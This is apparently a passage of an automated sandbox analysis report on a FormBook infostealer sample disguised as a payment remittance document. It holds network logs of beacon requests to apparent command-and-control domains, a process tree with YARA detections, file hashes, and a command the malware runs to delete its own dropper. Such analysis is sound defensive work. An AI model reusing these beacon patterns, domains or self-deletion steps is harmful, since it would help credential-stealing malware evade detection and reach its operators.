Timestamp: Sep 15, 2021 08:17:04.289372921 CEST | kBytes transferred: 5873 | Direction: IN
HTTP/1.1 301 Moved Permanently
Server: openresty/1.17.8.2
Date: Wed, 15 Sep 2021 06:17:04 GMT
Content-Type: text/html
Content-Length: 175
Connection: close
Location: https://www.johnharrisagent.com/uytf/?4hax=1GgOydTR9rFB1tFiaPZsKtEWQf/ik/nrf61jzTsng/4mIf33LxMFmIGp7DtpN0+eCTBT&6lE=xT6Pc
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 37 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.17.8.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49784 | 198.54.117.211 | 80 | C:\Windows\explorer.exe

Timestamp: Sep 15, 2021 08:17:15.112241030 CEST | kBytes transferred: 5895 | Direction: OUT
GET /uytf/?4hax=Lw8pQUl/qe2gQHW8JEklnfX9vlL4ErZAhlphDfsrttl8uYXfrtRE5waSCzthMEOsFHNR&6lE=xT6Pc HTTP/1.1
Host: www.itsready.support
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49785 | 103.15.104.66 | 80 | C:\Windows\explorer.exe

Timestamp: Sep 15, 2021 08:17:27.279082060 CEST | kBytes transferred: 5896 | Direction: OUT
GET /uytf/?4hax=0R01lDMz+xXIWoinSyO5qQyNMJHeVacFioz47MHPNe7DMd9wx+TtySfTu0uIVXra7tyR&6lE=xT6Pc HTTP/1.1
Host: www.btt5204.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Sep 15, 2021 08:17:27.555051088 CEST | kBytes transferred: 5897 | Direction: IN
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 15 Sep 2021 06:17:27 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.btt5204.com/uytf/?4hax=0R01lDMz+xXIWoinSyO5qQyNMJHeVacFioz47MHPNe7DMd9wx+TtySfTu0uIVXra7tyR&6lE=xT6Pc
Strict-Transport-Security: max-age=31536000; includeSubDomains
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 08:15:35
Start date: 15/09/2021
Path: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe'
Imagebase: 0x3c0000
File size: 509952 bytes
MD5 hash: E29285288905EBB27D9E4443BCAA6638
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 08:15:43
Start date: 15/09/2021
Path: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
Imagebase: 0x8a0000
File size: 509952 bytes
MD5 hash: E29285288905EBB27D9E4443BCAA6638
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 08:15:45
Start date: 15/09/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff714890000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high

                                                            General

                                                            Start time:08:16:16
                                                            Start date:15/09/2021
                                                            Path:C:\Windows\SysWOW64\autoconv.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                            Imagebase:0x950000
                                                            File size:851968 bytes
                                                            MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Start time:08:16:16
                                                            Start date:15/09/2021
                                                            Path:C:\Windows\SysWOW64\raserver.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\raserver.exe
                                                            Imagebase:0xc30000
                                                            File size:108544 bytes
                                                            MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:moderate

                                                            General

                                                            Start time:08:16:20
                                                            Start date:15/09/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del 'C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe'
                                                            Imagebase:0xbd0000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:08:16:21
                                                            Start date:15/09/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6b2800000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Disassembly

                                                            Code Analysis
